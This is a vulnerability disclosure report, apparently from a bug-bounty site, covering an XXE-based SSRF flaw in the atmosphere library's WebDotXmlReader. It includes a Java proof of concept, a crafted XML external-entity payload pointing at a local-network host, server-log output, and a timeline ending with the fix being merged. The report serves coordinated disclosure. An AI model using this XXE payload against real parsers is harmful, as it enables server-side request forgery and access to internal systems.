Improper Restriction of XML External Entity Reference in atmosphere/atmosphere

Valid

Reported on

Oct 7th 2021


Description

The atmosphere is vulnerable to SSRF ( Server Side Request Forgery ) via XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the WebDotXmlReader() constructor in the "WebDotXmlReader.java" file may allow an attacker to execute XML External Entities (XXE).

Proof of Concept

import java.io.FileInputStream;
import java.io.InputStream;

import org.atmosphere.util.WebDotXmlReader;

public class Poc {

    @SuppressWarnings("unused")
    public static void main(String[] args) {        
        try {
            InputStream inputStream = new FileInputStream("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
            WebDotXmlReader wxmlreader = new WebDotXmlReader(inputStream);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample_ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://192.168.1.16:8800/text.txt">]>
<foo>&xxe;</foo>

Output

└─# python3 -m http.server 8800
Serving HTTP on 0.0.0.0 port 8800 (http://0.0.0.0:8800/) ...
192.168.1.57 - - [07/Oct/2021 16:39:07] "GET /text.txt HTTP/1.1" 200 -
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
2 months ago
We have contacted a member of the atmosphere team and are waiting to hear back 2 months ago
atmosphere/atmosphere maintainer validated this vulnerability a month ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
atmosphere/atmosphere maintainer confirmed that a fix has been merged on efb38e a month ago
The fix bounty has been dropped